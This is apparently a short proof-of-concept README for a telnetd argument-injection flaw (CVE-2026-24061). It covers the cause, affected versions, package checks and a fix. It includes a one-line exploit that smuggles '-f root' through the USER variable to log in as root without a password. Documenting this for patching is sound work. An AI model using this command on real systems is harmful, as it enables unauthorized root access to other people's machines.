
CVE-2026-24061-PoC
telnetd Argument InjectionAn argument injection vulnerability affects the GNU InetUtils Telnet daemon (telnetd). Insufficient sanitization of client-supplied environment variables during NEW_ENVIRON negotiation allows an attacker to inject command-line flags into the local login process, potentially resulting in authentication bypass.
telnetd → /usr/bin/loginGNU InetUtils telnetd 1.9.3 – 2.7 (unpatched).
During session negotiation, telnetd honors the NEW_ENVIRON Telnet option, which lets a client pass environment variables such as USER to the server. The daemon then interpolates this value directly into the argument list used to invoke /usr/bin/login.
Because the value is not validated to contain only legal username characters, a client can supply a string beginning with a hyphen (-). Rather than being treated as a username, this is parsed by login as a command-line flag. Depending on the login implementation, this can enable behaviors such as skipping password authentication (e.g., via a -f "already authenticated" flag), leading to unauthorized access.
Set the USER environment variable to a value containing an option flag before connecting:
USER="-f root" telnet -a <target_ip>
If the target is vulnerable, login interprets -f root as an instruction to authenticate as root without a password, rather than treating -f root as a literal username.
Check installed package version:
Debian / Ubuntu:
dpkg -l | grep inetutils-telnetd
RHEL / CentOS:
rpm -qa | grep inetutils
telnetd rejects or strips any USER value beginning with - before passing it to login.